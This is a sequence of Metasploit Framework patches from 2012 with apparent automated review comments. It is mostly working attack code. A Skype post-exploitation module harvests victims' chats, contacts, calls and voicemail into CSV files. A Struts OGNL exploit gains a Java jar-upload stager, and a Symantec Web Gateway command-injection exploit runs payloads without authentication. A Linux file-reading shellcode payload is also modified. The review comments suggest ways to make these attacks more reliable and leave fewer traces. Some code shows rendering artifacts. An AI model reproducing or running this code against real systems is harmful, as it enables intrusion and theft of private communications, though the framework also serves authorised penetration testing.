From b302f50dbe72f246065cdeadd801498258f8df09 Mon Sep 17 00:00:00 2001 From: Carlos Perez Date: Tue, 5 Jun 2012 19:11:30 -0400 Subject: [PATCH 01/18] Initial version of the module supporting Windows and OSX --- modules/post/multi/gather/skype_enum.rb | 267 ++++++++++++++++++++++++ 1 file changed, 267 insertions(+) create mode 100644 modules/post/multi/gather/skype_enum.rb diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb new file mode 100644 index 0000000000..5d11c877c9 --- /dev/null +++ b/modules/post/multi/gather/skype_enum.rb 
@@ -0,0 +1,267 @@ +## +# $Id$ +## + +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'rex' +require 'csv' + +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/windows/user_profiles' + +require 'msf/core/post/osx/system' + + + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Windows::UserProfiles + + include Msf::Post::OSX::System + + + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Multi Gather Skype User Data Enumeration', + 'Description' => %q{ + This module will enumerate the Skype accounts settings, contact list, call history, chat logs, + file transfer history and voicemail log saving all the data in to CSV files for analysis. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Carlos Perez '], + 'Version' => '$Revision$', + 'Platform' => [ 'windows', 'osx' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + # Run Method for when run command is issued + def run + # syinfo is only on meterpreter sessions + print_status("Running module for Skype enumeration against #{sysinfo['Computer']}") if not sysinfo.nil? 
+ + # Ensure that SQLite3 gem is installed + begin + require 'sqlite3' + rescue LoadError + print_error("SQLite3 is not available, and we are not able to parse the database.") + return + end + + if sysinfo['OS']=~ /Mac OS X/ + # Iterate thru each user profile on as OSX System for users not in the default install + users = get_nonsystem_accounts.collect {|p| if p['uid'].to_i > 500; p; end }.compact + users.each do |p| + if check_skype("#{p['dir']}/Library/Application Support/", p['name']) + db_in_loot = download_db(p) + process_db(db_in_loot,p['name']) + end + end + else + # Iterate thru each user profile in a Windows System using Meterpreter Post API + grab_user_profiles().each do |p| + if check_skype(p['AppData'],p['UserName']) + db_in_loot = download_db(p) + process_db(db_in_loot,p['UserName']) + end + end + end + end + + # Check if Skype is installed. Returns true or false. + def check_skype(path, user) + session.fs.dir.foreach(path) do |dir| + if dir =~ /Skype/ + print_good("Skype account found for #{user}") + return true + end + end + print_error("Skype is not installed for #{user}") + return false + end + + # Download file using Meterpreter functionality and returns path in loot for the file + def download_db(profile) + if sysinfo['OS'] =~ /Mac OS X/ + file = session.fs.file.search("#{profile['dir']}///Library/Application Support/Skype/","main.db",true) + else + file = session.fs.file.search("#{profile['AppData']}\\Skype","main.db",true) + end + + file_loc = store_loot("skype.config", + "binary/db", + session, + "main.db", + "Skype Configuration database for #{profile['UserName']}" + ) + + file.each do |db| + maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}" + print_status("Downloading #{maindb}") + session.fs.file.download_file(file_loc,maindb) + print_good("Configuration database saved to #{file_loc}") + end + + return file_loc + end + + # Saves rows returned from a query to a given CSV file + def save_csv(data,file) + CSV.open(file, "w") do 
|csvwriter| + data.each do |record| + csvwriter << record + end + end + end + # Extracts the data from the DB in to a CSV file + def process_db(db_path,user) + db = SQLite3::Database.new(db_path) + + # Extract information for accounts configured in Skype + print_status("Enumerating accounts") + user_rows = db.execute2('SELECT "skypeout_balance_currency", "skypeout_balance", "skypeout_precision", + "skypein_numbers", "subscriptions", "offline_callforward", "service_provider_info", + "registration_timestamp", "nr_of_other_instances", "partner_channel_status", + "flamingo_xmpp_status", "owner_under_legal_age", "type", "skypename", + "pstnnumber", "fullname", "birthday", "gender", "languages", "country", + "province", "city", "phone_home", "phone_office", "phone_mobile", "emails", + "homepage", "about", "profile_timestamp", "received_authrequest", + "displayname", "refreshing", "given_authlevel", "aliases", "authreq_timestamp", + "mood_text", "timezone", "nrof_authed_buddies", "ipcountry", + "given_displayname", "availability", "lastonline_timestamp", + "assigned_speeddial", "lastused_timestamp", "assigned_comment", "alertstring", + "avatar_timestamp", "mood_timestamp", "rich_mood_text", "synced_email", + "verified_email", "verified_company" FROM Accounts;') + + # Check if an account exists and if it does enumerate if not exit. + if user_rows.length > 1 + user_info = store_loot("skype.accounts", + "text/plain", session,"" , + "skype_accounts.csv", + "Skype User #{user} Account information from configuration database." 
+ ) + print_good("Saving account information to #{user_info}") + save_csv(user_rows,user_info) + else + print_error("No skype accounts are configured for #{user}") + return + end + + # Extract chat log from the database + print_status("Extracting chat message log.") + cl_rows = db.execute2('SELECT "chatname", "convo_id", "author", "dialog_partner", + "timestamp", "body_xml", "remote_id" FROM "Messages" WHERE type == 61;') + chat_log = store_loot("#skype.chat", + "text/plain", session,"" , + "skype_chatlog.csv", + "Skype User #{user} chat log from configuration database." + ) + + if cl_rows.length > 1 + print_good("Saving chat log to #{chat_log}") + save_csv(cl_rows, chat_log) + else + print_error("No chat logs where found!") + end + + # Extract file transfer history + print_status("Extracting file transfer history") + ft_rows = db.execute2('SELECT "partner_handle", "partner_dispname", "starttime", + "finishtime", "filepath", "filename", "filesize", "bytestransferred", + "convo_id", "accepttime" FROM "Transfers";') + + file_transfer = store_loot("skype.filetransfer", + "text/csv", + session, + "", + "skype_filetransfer.csv", + "Skype User #{user} file transfer history." + ) + # Check that we have actual file transfers to report + if ft_rows.length > 1 + print_good("Saving file transfer history to #{file_transfer}") + save_csv(ft_rows, file_transfer) + else + print_error("No file transfer history was found!") + end + + # Extract voicemail history + print_status("Extracting voicemail history") + vm_rows = db.execute2('SELECT "type", "partner_handle", "partner_dispname", "status", + "subject", "timestamp", "duration", "allowed_duration", "playback_progress", + "convo_id", "chatmsg_guid", "notification_id", "flags", "size", "path", + "xmsg" FROM "Voicemails";') + + voicemail = store_loot("skype.voicemail", + "text/csv", + session, + "", + "skype_voicemail.csv", + "Skype User #{user} voicemail history." 
+ ) + + if vm_rows.length > 1 + print_good("Saving voicemail history to #{voicemail}") + save_csv(vm_rows, voicemail) + else + print_error("No voicemail history was found!") + end + + # Extracting call log + print_status("Extracting call log") + call_rows = db.execute2('SELECT "begin_timestamp", "topic","host_identity", "mike_status", + "duration", "soundlevel", "name", "is_incoming", "is_conference", "is_on_hold", + "start_timestamp", "quality_problems", "current_video_audience", + "premium_video_sponsor_list", "conv_dbid" FROM "Calls";') + + call_log = store_loot("skype.callhistory", + "text/csv", + session, + "", + "skype_callhistory.csv", + "Skype User #{user} call history." + ) + if call_rows.length > 1 + print_good("Saving call log to #{call_log}") + save_csv(call_rows, call_log) + else + print_error("No call log was found!") + end + + # Extracting contact list + print_status("Extracting contact list") + ct_rows = db.execute2('SELECT "skypename", "pstnnumber", "aliases", "fullname", + "birthday", "languages", "country", "province", "city", "phone_home", + "phone_office", "phone_mobile", "emails", "homepage", "about", "mood_text", + "ipcountry", "lastonline_timestamp", "displayname", "given_displayname", + "assigned_speeddial", "assigned_comment","assigned_phone1", + "assigned_phone1_label", "assigned_phone2", "assigned_phone2_label", + "assigned_phone3", "assigned_phone3_label", "popularity_ord", "isblocked", + "main_phone", "phone_home_normalized", "phone_office_normalized", + "phone_mobile_normalized", "verified_email", "verified_company" + FROM "Contacts";') + + contact_log = store_loot("skype.contactlist", + "text/csv", + session, + "", + "skype_contactlist.csv", + "Skype User #{user} contact list." + ) + if ct_rows.length > 1 + print_good("Saving contact list to #{contact_log}") + save_csv(ct_rows, contact_log) + end + end +end \ No newline at end of file From b004f35354b9512f612232063a3a40dcf62d9840 Mon Sep 17 00:00:00 2001 
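Review bot: In download_db every main.db that `session.fs.file.search` finds is downloaded onto the same `file_loc`, so a user with more than one Skype account (Skype keeps one main.db per account directory) ends up with only the last database in loot, and process_db is then run once on that single file; the loot entry should be created per database and all of them handed back to run. check_skype also lets `session.fs.dir.foreach` raise when `path` does not exist (an OSX user without `Library/Application Support`, a Windows profile with no AppData) instead of returning false, so one missing directory aborts the whole enumeration — rescue there and return false. Smaller points in the same hunk: the loot description uses `profile['UserName']`, which is nil for the OSX profiles that carry `'name'`; process_db never calls `db.close`; and `"No chat logs where found!"` should read `were`. The rewrite below changes download_db to return an array, so the two `process_db(db_in_loot, …)` call sites in run need to iterate over it.
```ruby
def download_db(profile)
  # … unchanged: platform-specific session.fs.file.search …
  user = profile['UserName'] || profile['name']
  loot_paths = []
  file.each do |db|
    maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}"
    file_loc = store_loot("skype.config", "binary/db", session, "",
                          "main.db", "Skype Configuration database for #{user}")
    print_status("Downloading #{maindb}")
    session.fs.file.download_file(file_loc, maindb)
    print_good("Configuration database saved to #{file_loc}")
    loot_paths << file_loc
  end
  loot_paths
end
```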
From: Carlos Perez Date: Wed, 6 Jun 2012 16:28:42 -0400 Subject: [PATCH 02/18] Change failure of loading gem message to be in par with other gem error messages in the framework, also date is better represented in the CSV with UTC value --- modules/post/multi/gather/skype_enum.rb | 59 ++++++++++++++----------- 1 file changed, 34 insertions(+), 25 deletions(-) diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index 5d11c877c9..4280effac0 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post begin require 'sqlite3' rescue LoadError - print_error("SQLite3 is not available, and we are not able to parse the database.") + print_error("Failed to load sqlite3, try 'gem install sqlite3'") return end 
@@ -132,22 +132,26 @@ class Metasploit3 < Msf::Post print_status("Enumerating accounts") user_rows = db.execute2('SELECT "skypeout_balance_currency", "skypeout_balance", "skypeout_precision", "skypein_numbers", "subscriptions", "offline_callforward", "service_provider_info", - "registration_timestamp", "nr_of_other_instances", "partner_channel_status", - "flamingo_xmpp_status", "owner_under_legal_age", "type", "skypename", - "pstnnumber", "fullname", "birthday", "gender", "languages", "country", - "province", "city", "phone_home", "phone_office", "phone_mobile", "emails", - "homepage", "about", "profile_timestamp", "received_authrequest", + datetime("timestamp","unixepoch")"registration_timestamp", + "nr_of_other_instances", "partner_channel_status", "flamingo_xmpp_status", + "owner_under_legal_age", "type", "skypename", "pstnnumber", "fullname", + "birthday", "gender", "languages", "country", "province", "city", "phone_home", + "phone_office", "phone_mobile", "emails", "homepage", "about", + datetime("profile_timestamp","unixepoch"), "received_authrequest", "displayname", "refreshing", "given_authlevel", "aliases", "authreq_timestamp", "mood_text", "timezone", "nrof_authed_buddies", "ipcountry", - "given_displayname", "availability", "lastonline_timestamp", - "assigned_speeddial", "lastused_timestamp", "assigned_comment", "alertstring", - "avatar_timestamp", "mood_timestamp", "rich_mood_text", "synced_email", + "given_displayname", "availability", datetime("lastonline_timestamp","unixepoch"), + "assigned_speeddial", datetime("lastused_timestamp","unixepoch"), + "assigned_comment", "alertstring", datetime("avatar_timestamp","unixepoch"), + datetime("mood_timestamp","unixepoch"), "rich_mood_text", "synced_email", "verified_email", "verified_company" FROM Accounts;') # Check if an account exists and if it does enumerate if not exit. 
if user_rows.length > 1 user_info = store_loot("skype.accounts", - "text/plain", session,"" , + "text/plain", + session, + "", "skype_accounts.csv", "Skype User #{user} Account information from configuration database." ) @@ -159,11 +163,14 @@ class Metasploit3 < Msf::Post end # Extract chat log from the database - print_status("Extracting chat message log.") + print_status("Extracting chat message log") cl_rows = db.execute2('SELECT "chatname", "convo_id", "author", "dialog_partner", - "timestamp", "body_xml", "remote_id" FROM "Messages" WHERE type == 61;') - chat_log = store_loot("#skype.chat", - "text/plain", session,"" , + datetime("timestamp","unixepoch"), "body_xml", + "remote_id" FROM "Messages" WHERE type == 61;') + chat_log = store_loot("skype.chat", + "text/plain", + session, + "", "skype_chatlog.csv", "Skype User #{user} chat log from configuration database." ) @@ -177,9 +184,10 @@ class Metasploit3 < Msf::Post # Extract file transfer history print_status("Extracting file transfer history") - ft_rows = db.execute2('SELECT "partner_handle", "partner_dispname", "starttime", - "finishtime", "filepath", "filename", "filesize", "bytestransferred", - "convo_id", "accepttime" FROM "Transfers";') + ft_rows = db.execute2('SELECT "partner_handle", "partner_dispname", + datetime("starttime","unixepoch"), datetime("finishtime","unixepoch"), + "filepath", "filename", "filesize", "bytestransferred", + "convo_id", datetime("accepttime","unixepoch") FROM "Transfers";') file_transfer = store_loot("skype.filetransfer", "text/csv", 
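Review bot: The first rewritten column of the Accounts query, `datetime("timestamp","unixepoch")"registration_timestamp",`, is missing its comma and converts the wrong column: SQLite parses the trailing `"registration_timestamp"` as a column alias, and `"timestamp"` — which nothing else in this query treats as an Accounts column — falls back to a plain string literal under SQLite's double-quoted-string rule, so the registration time silently comes out NULL beneath a correct-looking header. It should read `datetime("registration_timestamp","unixepoch"),`. The other converted columns in this hunk are fine but now surface in the CSV header row (execute2 emits column names first) as text like `datetime("profile_timestamp","unixepoch")`; an alias such as `datetime("profile_timestamp","unixepoch") AS "profile_timestamp"` keeps the headers usable.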
@@ -199,9 +207,9 @@ class Metasploit3 < Msf::Post # Extract voicemail history print_status("Extracting voicemail history") vm_rows = db.execute2('SELECT "type", "partner_handle", "partner_dispname", "status", - "subject", "timestamp", "duration", "allowed_duration", "playback_progress", - "convo_id", "chatmsg_guid", "notification_id", "flags", "size", "path", - "xmsg" FROM "Voicemails";') + "subject", datetime("timestamp","unixepoch"), "duration", "allowed_duration", + "playback_progress", "convo_id", "chatmsg_guid", "notification_id", "flags", + "size", "path", "xmsg" FROM "Voicemails";') voicemail = store_loot("skype.voicemail", "text/csv", @@ -220,9 +228,10 @@ class Metasploit3 < Msf::Post # Extracting call log print_status("Extracting call log") - call_rows = db.execute2('SELECT "begin_timestamp", "topic","host_identity", "mike_status", - "duration", "soundlevel", "name", "is_incoming", "is_conference", "is_on_hold", - "start_timestamp", "quality_problems", "current_video_audience", + call_rows = db.execute2('SELECT datetime("begin_timestamp","unixepoch"), + "topic","host_identity", "mike_status", "duration", "soundlevel", "name", + "is_incoming", "is_conference", "is_on_hold", + datetime("start_timestamp","unixepoch"), "quality_problems", "current_video_audience", "premium_video_sponsor_list", "conv_dbid" FROM "Calls";') call_log = store_loot("skype.callhistory", 
@@ -244,8 +253,8 @@ class Metasploit3 < Msf::Post ct_rows = db.execute2('SELECT "skypename", "pstnnumber", "aliases", "fullname", "birthday", "languages", "country", "province", "city", "phone_home", "phone_office", "phone_mobile", "emails", "homepage", "about", "mood_text", - "ipcountry", "lastonline_timestamp", "displayname", "given_displayname", - "assigned_speeddial", "assigned_comment","assigned_phone1", + "ipcountry", datetime("lastonline_timestamp","unixepoch"), "displayname", + "given_displayname", "assigned_speeddial", "assigned_comment","assigned_phone1", "assigned_phone1_label", "assigned_phone2", "assigned_phone2_label", "assigned_phone3", "assigned_phone3_label", "popularity_ord", "isblocked", "main_phone", "phone_home_normalized", "phone_office_normalized", From b4d33fb85a371e2b40debb9d36f05f4d269fff17 Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Sat, 9 Jun 2012 21:52:57 +0200 Subject: [PATCH 03/18] Add ARCH_JAVA support to struts_code_exec_exception_delegator --- .../struts_code_exec_exception_delegator.rb | 52 ++++++++++++++++++- 1 file changed, 50 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index 805b2545dd..ad013800aa 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -29,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Johannes Dahse', # Vulnerability discovery and PoC 'Andreas Nusser', # Vulnerability discovery and PoC 'juan vazquez', # Metasploit module - 'sinn3r' # Metasploit module + 'sinn3r', # Metasploit module + 'mihi' # ARCH_JAVA support ], 'License' => MSF_LICENSE, 'Version' => '$Revision: $', 
@@ -40,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'EDB', '18329'], [ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt'] ], - 'Platform' => [ 'win', 'linux'], + 'Platform' => [ 'win', 'linux', 'java'], 'Privileged' => true, 'Targets' => [ @@ -56,6 +57,12 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'linux' } ], + [ 'Java Universal', + { + 'Arch' => ARCH_JAVA, + 'Platform' => 'java' + }, + ] ], 'DisclosureDate' => 'Jan 06 2012', 'DefaultTarget' => 0)) @@ -73,6 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = String.new(datastore['TARGETURI']) uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win' uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux' + uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,CMD,'')%2b'") if target['Platform'] == 'java' uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd)) vprint_status("Attempting to execute: #{cmd}") 
@@ -120,6 +128,44 @@ class Metasploit3 < Msf::Exploit::Remote @payload_exe = "/tmp/" + file end + def java_upload_part(part, filename, append = 'false') + cmd = "" + cmd << "#f=new java.io.FileOutputStream('#(unknown)',#{append})," + cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))," + cmd << "#f.close()" + execute_command(cmd) + end + + def java_stager + @payload_exe = rand_text_alphanumeric(4+rand(4)) + ".jar" + append = 'false' + jar = payload.encoded_jar.pack + + chunk_length = 384 # 512 bytes when base64 encoded + + while(jar.length > chunk_length) + java_upload_part(jar[0, chunk_length], @payload_exe, append) + jar = jar[chunk_length, jar.length - chunk_length] + append='true' + end + java_upload_part(jar, @payload_exe, append) + + cmd = "" + # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1 + cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," + cmd << "#q.setAccessible(true),#q.set(null,true)," + cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15')," + cmd << "#q.setAccessible(true),#q.set(null,false)," + # create classloader + cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()})," + # load class + cmd << "#c=#cl.loadClass('metasploit.Payload')," + # invoke main method + cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" + cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" + execute_command(cmd) + end + def on_new_session(client) if target['Platform'] == 'linux' print_status("Deleting #{@payload_exe} payload file") @@ -142,6 +188,8 @@ class Metasploit3 < Msf::Exploit::Remote linux_stager when 'win' windows_stager + when 'java' + java_stager else raise RuntimeError, 'Unsupported target platform!' end From 881ec8d920c776102889311248af5d6d9596dd4d Mon Sep 17 00:00:00 2001 
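Review bot: java_stager writes the payload jar under a relative name (`rand_text_alphanumeric(4+rand(4)) + ".jar"`) into whatever working directory the servlet container happens to run in, and nothing removes it afterwards — the on_new_session branch that begins at the end of this hunk only deletes for `'linux'`, so the java target leaves the jar on disk; add `elsif target['Platform'] == 'java'` with `execute_command("new java.io.File('#{@payload_exe}').delete()")` there (on_new_session continues outside the hunk). In java_upload_part the FileOutputStream path is the literal `'#(unknown)'` as rendered here rather than the `filename` argument; if that is not an artifact of how this patch was captured, the chunks never reach `@payload_exe`, so confirm the interpolation is `'#{filename}'`. `sun.misc.BASE64Decoder` is a JDK-internal class rather than public API, so the stager presumably only works on runtimes that ship it; a comment saying so next to the 384-byte chunk size would save the next reader a surprise.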
From: HD Moore Date: Sun, 10 Jun 2012 13:19:22 -0500 Subject: [PATCH 04/18] Make the description clear that it only reads 4k, default datastore['FD'] to 1 --- modules/payloads/singles/linux/x86/read_file.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/payloads/singles/linux/x86/read_file.rb b/modules/payloads/singles/linux/x86/read_file.rb index cfcd09c71f..57f23d36b3 100644 --- a/modules/payloads/singles/linux/x86/read_file.rb +++ b/modules/payloads/singles/linux/x86/read_file.rb @@ -16,7 +16,7 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Linux Read File', 'Version' => '', - 'Description' => 'Read a file from the local file system, and write it back out to the specified file descriptor', + 'Description' => 'Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor', 'Author' => 'hal', 'License' => MSF_LICENSE, 'Platform' => 'linux', @@ -25,13 +25,13 @@ module Metasploit3 # Register exec options register_options( [ - OptString.new('FILE', [ true, "The file to read" ]), - OptString.new('FD', [ false, "The file descriptor to write output to" ]), + OptString.new('PATH', [ true, "The file path to read" ]), + OptString.new('FD', [ true, "The file descriptor to write output to", 1 ]), ], self.class) end def generate_stage - fd = datastore['FD'] || 1 + fd = datastore['FD'] payload_data =<<-EOS jmp file @@ -63,7 +63,7 @@ module Metasploit3 file: call open - db "#{datastore['FILE']}", 0x00 + db "#{datastore['PATH']}", 0x00 EOS Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string From efcb206cdfb4c6bea55ec03ef39eb0af505d7238 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sun, 10 Jun 2012 14:38:14 -0500 Subject: [PATCH 05/18] Correct a typo --- modules/exploits/windows/fileformat/ms12_005.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
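Review bot: Renaming the `FILE` option to `PATH` silently breaks every existing resource script or command line that sets `FILE`: with `PATH` required and no fallback, those invocations now fail option validation rather than reading the old value. If the rename is wanted, keep the old name as a deprecated alias — `OptString.new('FILE', [false, 'Deprecated, use PATH'])` — and read `datastore['PATH'] || datastore['FILE']` in generate_stage. Making `FD` required with a default of 1 is fine, but the value is still taken as a string; where it is later spliced into the assembly source (outside this hunk) an `Integer(datastore['FD'])` would reject a non-numeric descriptor up front instead of producing an assembler error.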
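Review bot: `db "#{datastore['PATH']}", 0x00` still splices the option value straight into the Metasm source, so a path containing a double quote breaks or alters the assembly instead of being reported — the rename from FILE to PATH does not change this. Emitting the path as bytes avoids quoting entirely: `db #{datastore['PATH'].bytes.map { |b| "0x%02x" % b }.join(', ')}, 0x00`. A short comment on the `db` line, `# NUL-terminated path consumed by the open() above`, would also make the 0x00 self-explanatory.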
diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index 760c4af01f..da22678f79 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -192,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote p = file.sub(path+'/','') if File.directory?(file) - print_status("Packging directory: #{file}") + print_status("Packaging directory: #{file}") zip.add_file(p) else on_file_read(p, file) do |fname, buf| From 74c6eb6f78ca4be31ab37625a257938bf8b9fac4 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sun, 10 Jun 2012 14:45:15 -0500 Subject: [PATCH 06/18] Change the title and add a Microsoft reference. This is a MS bug, therefore it's important to point out which bulletin it belongs to. --- modules/exploits/windows/browser/ms11_093_ole32.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb index 16a0e5c476..b7b6344e0f 100644 --- a/modules/exploits/windows/browser/ms11_093_ole32.rb +++ b/modules/exploits/windows/browser/ms11_093_ole32.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, - 'Name' => "Microsoft Windows OLE Object File Handling Remote Code Execution", + 'Name' => "MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution", 'Description' => %q{ This module exploits a type confusion vulnerability in the OLE32 component of Windows XP SP3. The vulnerability exists in the CPropertyStorage::ReadMultiple @@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ + [ 'MSB', 'MS11-093'], [ 'CVE', '2011-3400' ], [ 'OSVDB', '77663'], [ 'BID', '50977' ], From b908ccff0f8537d971ef01901fa0865ee20e74d4 Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 Date: Sun, 10 Jun 2012 22:38:58 +0200 Subject: [PATCH 07/18] Added module for CVE-2012-0297 --- .../linux/http/symantec_web_gateway_exec.rb | 97 +++++++++++++++++++ .../linux/http/symantec_web_gateway_lfi.rb | 2 +- 2 files changed, 98 insertions(+), 1 deletion(-) create mode 100644 modules/exploits/linux/http/symantec_web_gateway_exec.rb diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb new file mode 100644 index 0000000000..1f82d8522e --- /dev/null +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb 
@@ -0,0 +1,97 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection", + 'Description' => %q{ + This module exploits a command injection vulnerability found in Symantec Web + Gateway's HTTP service due to the insecure usage of the exec() function. This module + abuses the spywall/ipchange.php file to execute arbitrary OS commands without + authentication. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Tenable Network Security', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-0297' ], + [ 'BID', '53444' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ], + [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ] + ], + 'Payload' => + { + 'BadChars' => "\x00\x0d\x0a\x26", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl', + } + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Symantec Web Gateway 5.0.2.8', {}], + ], + 'Privileged' => false, + 'DisclosureDate' => "May 17 2012", + 'DefaultTarget' => 0)) + end + + + def check + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/spywall/login.php' + }) + + if res and res.body =~ /\Symantec Web Gateway\<\/title\>/ + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + def exploit + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + peer = "#{rhost}:#{rport}" + + 
post_data = "subnet=" + post_data << "\";" + payload.raw + ";#" + + print_status("#{peer} - Sending Command injection") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}spywall/ipchange.php", + 'data' => post_data + }) + + # If the server doesn't return the default redirection, probably + # something is wrong + if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/ + print_error("#{peer} - Probably command not executed, aborting!") + return + end + + end + + +end diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index 6fb1931ad4..40fea4e7f6 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, - 'Name' => "Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability", + 'Name' => "Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Symantec Web Gateway's HTTP service. By injecting PHP code in the access log, it is possible to load it From f9999a3033808507a79b969a4357c668a3ab87d0 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Sun, 10 Jun 2012 16:37:29 -0500 Subject: [PATCH 08/18] Add FusiuonVM Importer This adds a nokogiri stream parser for XML reports from Critical Watch's FusionVM. --- lib/msf/core/db.rb | 14 ++++ lib/rex/parser/fusionvm_nokogiri.rb | 108 ++++++++++++++++++++++++++++ 2 files changed, 122 insertions(+) create mode 100644 lib/rex/parser/fusionvm_nokogiri.rb diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 3823264ef1..9d53dcb299 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb 
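Review bot: `payload.raw` is spliced unencoded into what the server will treat as an application/x-www-form-urlencoded body (`post_data << "\";" + payload.raw + ";#"`), so a `+` or a `%xx` sequence in the generated command is rewritten by form decoding before it reaches exec(); either encode it, `post_data << Rex::Text.uri_encode("\";" + payload.raw + ";#")`, or add `+` and `%` to BadChars next to the `&` already listed. The check method's regexp, `/\Symantec Web Gateway\<\/title\>/` as rendered here, starts with `\S` (any non-whitespace character) rather than a literal `S`; if the opening `<title>` was lost when this patch was captured that is harmless, otherwise it should be `/Symantec Web Gateway<\/title>/`. The post-exploit check only confirms the 302 to admin_config.php, which presumably fires whether or not the injected command ran, so a comment noting that a missing session is the real success signal would help.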
@@ -10,6 +10,7 @@ require 'rex/parser/burp_session_nokogiri' require 'rex/parser/ci_nokogiri' require 'rex/parser/wapiti_nokogiri' require 'rex/parser/openvas_nokogiri' +require 'rex/parser/fusionvm_nokogiri' # Legacy XML parsers -- these will be converted some day 
